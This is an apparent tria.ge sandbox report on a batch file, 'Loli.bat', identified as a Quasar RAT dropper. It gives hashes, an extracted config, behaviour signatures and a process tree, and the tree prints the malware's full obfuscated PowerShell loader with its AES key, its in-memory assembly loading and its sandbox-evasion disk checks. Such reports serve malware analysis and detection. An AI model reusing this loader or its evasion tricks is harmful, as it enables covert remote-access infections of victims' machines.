Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    55s
  • max time network
    52s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02/01/2025, 23:05

General

  • Target

    Loli.bat

  • Size

    7.2MB

  • MD5

    d266b84f245e8de76e05e762e3b7cfca

  • SHA1

    ed75a3413e35ff95bb01a4027f38e2a0e22e2cae

  • SHA256

    26a49de957b5598e0c2e8d6d41d89320d3a363d9e6e4606237d2d487db6adaad

  • SHA512

    b19446cba7f08521accd3d8ab05312d454933e3e87c7b33b9f9c2d3f484e54f6ff4fb989649d6f467f7b2a44c7d7571d5e06348b7872f4ad8acceaad4ae95b4f

  • SSDEEP

    49152:2Ispe9WTFYTG/p+hBJhMIZHEUaS9Yvg/mAi+v16h18WqW18EfCfKNHppku4O3v9y:h

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    31387DAD824ED1DBDC13F28AAF68CFB9BAC9E25E

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 48 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:764
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{eabc6fb1-153b-4fed-a5c2-81e3942b67f0}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3388
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5cc4ba0c-4efc-464e-837b-95c8ca70e20e}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5008
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:704
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:1008
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:776
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:692
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1076
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1128
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1168
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1224
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1248
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1324
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1456
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1468
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2764
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                  PID:1520
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1600
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1612
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1700
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1732
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1792
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1852
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1040
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:2000
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:2056
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2064
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2100
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2152
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2292
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2316
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2500
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2508
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2584
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                    PID:2664
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2676
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2696
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2708
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2740
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2820
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3080
                                                                            • C:\Windows\Explorer.EXE
                                                                              C:\Windows\Explorer.EXE
                                                                              1⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:3296
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1292
                                                                                • C:\Windows\System32\Conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  3⤵
                                                                                    PID:1620
                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                    fsutil fsinfo drives
                                                                                    3⤵
                                                                                      PID:3684
                                                                                    • C:\Windows\system32\findstr.exe
                                                                                      findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                      3⤵
                                                                                        PID:3516
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        cmd.exe /c echo function nujd($lhNe){ Invoke-Expression -InformationAction Ignore '$COdX=[PoSPoyPostPoePomPo.SPoePocPourPoitPoyPo.PoCPoryPopPotPoogPorPoaPopPohPoyPo.APoePosPo]Po:Po:CPorePoatPoePo(Po);'.Replace('Po', ''); Invoke-Expression -WarningAction Inquire -Debug '$COdX.MrLorLdrLe=rL[rLSrLysrLtrLerLm.rLSerLcrLurLrrLitrLyrL.rLCrrLyrLprLtrLorLgrLrarLprLhrLyrL.rLCirLphrLerrLMrLorLdrLerL]:rL:rLCBrLC;'.Replace('rL', ''); Invoke-Expression -Verbose -Debug '$COdX.PiHaiHdiHdiiHniHgiH=[iHSiHyiHstiHemiH.iHSiHeiHcuiHriHiiHtyiH.iHCiHriHyiHpiHtoiHgiHriHaiHpiHhyiH.PiHadiHdiHiiHniHgiHMoiHdiHe]iH::iHPKiHCiHS7iH;'.Replace('iH', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$COdX.KNkeNkyNk=[NkSNkyNkstNkeNkmNk.CNkonNkvNkeNkrNkt]Nk:Nk:NkFrNkoNkmNkBNkaNksNke6Nk4NkSNktNkrNkinNkg("oNkKNkiNkLoNkINkeNk3DNk+Nk3NkcmNkfINkCNkANkdNkZbNkFNkCNkX8Nk1NkyNkzNkLNkmNkB0Nk0Nk0Nk3NkvNkc/Nk4BNkWhNkJNkMNk=");'.Replace('Nk', ''); Invoke-Expression -InformationAction Ignore -Debug '$COdX.IhWVhW=hW[ShWyhWshWtehWmhW.hWCohWnvhWehWrhWthW]:hW:hWFhWrohWmhWBhWahWshWehW64hWShWthWrhWihWnghW("ThWchWOhWIZhWbhWwhWWChWrhWAhWt/hWtAhW0hW1hWzhW2shWUhWAhW==hW");'.Replace('hW', ''); $XgMn=$COdX.CreateDecryptor(); $eBBZ=$XgMn.TransformFinalBlock($lhNe, 0, $lhNe.Length); $XgMn.Dispose(); $COdX.Dispose(); $eBBZ;}function azYi($lhNe){ Invoke-Expression -Verbose '$BinA=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom(,$lhNe);'.Replace('ao', ''); Invoke-Expression -InformationAction Ignore '$sddt=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom;'.Replace('ao', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$Snik=NiEeiEwiE-OiEbiEjiEeciEtiE iESyiEstiEeiEmiE.iEIOiE.iECiEomiEpiEriEeiEsiEsiEioiEniE.iEGiEZiEipiEStiEreiEaiEm($BinA, [iEIiEOiE.CiEoiEmiEpriEeiEsiEsiiEoniE.iECiEoiEmpiEriEeiEssiEiiEoiEniEMiEoiEdeiE]iE:iE:iEDiEeciEomiEpriEeiEsiEs);'.Replace('iE', ''); $Snik.CopyTo($sddt); $Snik.Dispose(); $BinA.Dispose(); $sddt.Dispose(); $sddt.ToArray();}function nkjd($lhNe,$pDlr){ Invoke-Expression -Debug -Verbose '$GhnL=[puSpuypustpuepumpu.Rpuepufpulepuctpuipuopunpu.Apuspuspuempubpulpuypu]pu:pu:Lpuopuapud([byte[]]$lhNe);'.Replace('pu', ''); Invoke-Expression -InformationAction Ignore '$VpgC=$GhnL.EUUnUUtUUryUUPUUoUUinUUtUU;'.Replace('UU', ''); Invoke-Expression -WarningAction Inquire '$VpgC.WGIWGnWGvoWGkWGeWG($WGnWGuWGllWG, $pDlr);'.Replace('WG', '');}$ocvt = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $ocvt;$acGn=[System.IO.File]::ReadAllText($ocvt).Split([Environment]::NewLine);foreach ($fvZg in $acGn) { if ($fvZg.StartsWith('DsrMx')) { $wllg=$fvZg.Substring(5); break; }}$ykOK=[string[]]$wllg.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$CSX = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$fPU = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore '$aXY = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');nkjd $CSX $null;nkjd $fPU $null;nkjd $aXY (,[string[]] (''));
                                                                                        3⤵
                                                                                          PID:1972
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -WindowStyle Hidden
                                                                                          3⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Drops file in Windows directory
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2544
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                                            4⤵
                                                                                            • Drops file in Windows directory
                                                                                            PID:4624
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              5⤵
                                                                                                PID:3396
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                                              4⤵
                                                                                                PID:3828
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  5⤵
                                                                                                    PID:1688
                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                    fsutil fsinfo drives
                                                                                                    5⤵
                                                                                                      PID:2960
                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                      findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
                                                                                                      5⤵
                                                                                                        PID:1384
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        cmd.exe /c echo function nujd($lhNe){ Invoke-Expression -InformationAction Ignore '$COdX=[PoSPoyPostPoePomPo.SPoePocPourPoitPoyPo.PoCPoryPopPotPoogPorPoaPopPohPoyPo.APoePosPo]Po:Po:CPorePoatPoePo(Po);'.Replace('Po', ''); Invoke-Expression -WarningAction Inquire -Debug '$COdX.MrLorLdrLe=rL[rLSrLysrLtrLerLm.rLSerLcrLurLrrLitrLyrL.rLCrrLyrLprLtrLorLgrLrarLprLhrLyrL.rLCirLphrLerrLMrLorLdrLerL]:rL:rLCBrLC;'.Replace('rL', ''); Invoke-Expression -Verbose -Debug '$COdX.PiHaiHdiHdiiHniHgiH=[iHSiHyiHstiHemiH.iHSiHeiHcuiHriHiiHtyiH.iHCiHriHyiHpiHtoiHgiHriHaiHpiHhyiH.PiHadiHdiHiiHniHgiHMoiHdiHe]iH::iHPKiHCiHS7iH;'.Replace('iH', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$COdX.KNkeNkyNk=[NkSNkyNkstNkeNkmNk.CNkonNkvNkeNkrNkt]Nk:Nk:NkFrNkoNkmNkBNkaNksNke6Nk4NkSNktNkrNkinNkg("oNkKNkiNkLoNkINkeNk3DNk+Nk3NkcmNkfINkCNkANkdNkZbNkFNkCNkX8Nk1NkyNkzNkLNkmNkB0Nk0Nk0Nk3NkvNkc/Nk4BNkWhNkJNkMNk=");'.Replace('Nk', ''); Invoke-Expression -InformationAction Ignore -Debug '$COdX.IhWVhW=hW[ShWyhWshWtehWmhW.hWCohWnvhWehWrhWthW]:hW:hWFhWrohWmhWBhWahWshWehW64hWShWthWrhWihWnghW("ThWchWOhWIZhWbhWwhWWChWrhWAhWt/hWtAhW0hW1hWzhW2shWUhWAhW==hW");'.Replace('hW', ''); $XgMn=$COdX.CreateDecryptor(); $eBBZ=$XgMn.TransformFinalBlock($lhNe, 0, $lhNe.Length); $XgMn.Dispose(); $COdX.Dispose(); $eBBZ;}function azYi($lhNe){ Invoke-Expression -Verbose '$BinA=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom(,$lhNe);'.Replace('ao', ''); Invoke-Expression -InformationAction Ignore '$sddt=Naoeaowao-Oaobaojaoecaotao aoSyaostaoeaomao.aoIOao.aoMaoemaooaoraoyaoSaotaoreaoaaom;'.Replace('ao', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore '$Snik=NiEeiEwiE-OiEbiEjiEeciEtiE iESyiEstiEeiEmiE.iEIOiE.iECiEomiEpiEriEeiEsiEsiEioiEniE.iEGiEZiEipiEStiEreiEaiEm($BinA, [iEIiEOiE.CiEoiEmiEpriEeiEsiEsiiEoniE.iECiEoiEmpiEriEeiEssiEiiEoiEniEMiEoiEdeiE]iE:iE:iEDiEeciEomiEpriEeiEsiEs);'.Replace('iE', ''); $Snik.CopyTo($sddt); $Snik.Dispose(); $BinA.Dispose(); $sddt.Dispose(); $sddt.ToArray();}function nkjd($lhNe,$pDlr){ Invoke-Expression -Debug -Verbose '$GhnL=[puSpuypustpuepumpu.Rpuepufpulepuctpuipuopunpu.Apuspuspuempubpulpuypu]pu:pu:Lpuopuapud([byte[]]$lhNe);'.Replace('pu', ''); Invoke-Expression -InformationAction Ignore '$VpgC=$GhnL.EUUnUUtUUryUUPUUoUUinUUtUU;'.Replace('UU', ''); Invoke-Expression -WarningAction Inquire '$VpgC.WGIWGnWGvoWGkWGeWG($WGnWGuWGllWG, $pDlr);'.Replace('WG', '');}$ocvt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $ocvt;$acGn=[System.IO.File]::ReadAllText($ocvt).Split([Environment]::NewLine);foreach ($fvZg in $acGn) { if ($fvZg.StartsWith('DsrMx')) { $wllg=$fvZg.Substring(5); break; }}$ykOK=[string[]]$wllg.Split('\');Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$CSX = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$fPU = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');Invoke-Expression -Debug -Verbose -InformationAction Ignore '$aXY = azYi (nujd ([OfCOfoOfnvOfeOfrOft]Of:Of:OfFrOfomOfBOfaOfsOfe6Of4OfSOftrOfiOfnOfg($ykOK[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Of', '');nkjd $CSX $null;nkjd $fPU $null;nkjd $aXY (,[string[]] (''));
                                                                                                        5⤵
                                                                                                          PID:2576
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell.exe -WindowStyle Hidden
                                                                                                          5⤵
                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Drops file in Windows directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:3452
                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                            "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                                                                            6⤵
                                                                                                              PID:1064
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                7⤵
                                                                                                                  PID:2368
                                                                                                      • C:\Windows\$nya-onimai2\DjGPQo.exe
                                                                                                        "C:\Windows\$nya-onimai2\DjGPQo.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2324
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          3⤵
                                                                                                            PID:5108
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                        1⤵
                                                                                                          PID:3428
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                          1⤵
                                                                                                            PID:3472
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:3848
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3928
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                  PID:4012
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                  1⤵
                                                                                                                    PID:4076
                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                    1⤵
                                                                                                                      PID:4356
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                      1⤵
                                                                                                                        PID:4448
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                        1⤵
                                                                                                                          PID:4932
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                          1⤵
                                                                                                                            PID:3132
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                            1⤵
                                                                                                                              PID:3504
                                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                              1⤵
                                                                                                                                PID:1368
                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:1536
                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                  1⤵
                                                                                                                                    PID:2020
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:2120
                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                      1⤵
                                                                                                                                        PID:2444
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:4336
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4704
                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                            1⤵
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            PID:2524

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                            Filesize

                                                                                                                                            3KB

                                                                                                                                            MD5

                                                                                                                                            f9473b5a292735eb63388f024419f671

                                                                                                                                            SHA1

                                                                                                                                            a313f974a2d7f8266f68c452a853cde8dba3a28d

                                                                                                                                            SHA256

                                                                                                                                            5a53dfd3670931d8d5610943c0e860ae2518298a889b803b628aa46f80ade07e

                                                                                                                                            SHA512

                                                                                                                                            77f951fe0f51c4a5b952771bdd4f5a6f295b2508da96cd3960f63932cfd280f8cb290ffcbca12533d36945f549d4de037654af9e0e1caf90a0588dd601a6601e

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                            Filesize

                                                                                                                                            1KB

                                                                                                                                            MD5

                                                                                                                                            e1c15d7791b65536820509298e68d8f4

                                                                                                                                            SHA1

                                                                                                                                            617db44f9b0d82f5c9918f98e96ee94179a29b11

                                                                                                                                            SHA256

                                                                                                                                            725b5041d79023220710218740241cd9edda721245ab283b33c0d13854d4984f

                                                                                                                                            SHA512

                                                                                                                                            82c19b76e69b91af07d631b9e17f9f1632b90ca23c670076ee2190bf8f960313f0b2e3856f177f50e639e3f479fd809755b73a0c333365fc8532239f20bf9082

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bllzpst1.fnw.ps1

                                                                                                                                            Filesize

                                                                                                                                            60B

                                                                                                                                            MD5

                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                            SHA1

                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                            SHA256

                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                            SHA512

                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                          • C:\Windows\$nya-onimai2\DjGPQo.exe

                                                                                                                                            Filesize

                                                                                                                                            36KB

                                                                                                                                            MD5

                                                                                                                                            b943a57bdf1bbd9c33ab0d33ff885983

                                                                                                                                            SHA1

                                                                                                                                            1cee65eea1ab27eae9108c081e18a50678bd5cdc

                                                                                                                                            SHA256

                                                                                                                                            878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4

                                                                                                                                            SHA512

                                                                                                                                            cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c

                                                                                                                                          • C:\Windows\$rbx-onimai2\$rbx-CO2.bat

                                                                                                                                            Filesize

                                                                                                                                            7.2MB

                                                                                                                                            MD5

                                                                                                                                            d266b84f245e8de76e05e762e3b7cfca

                                                                                                                                            SHA1

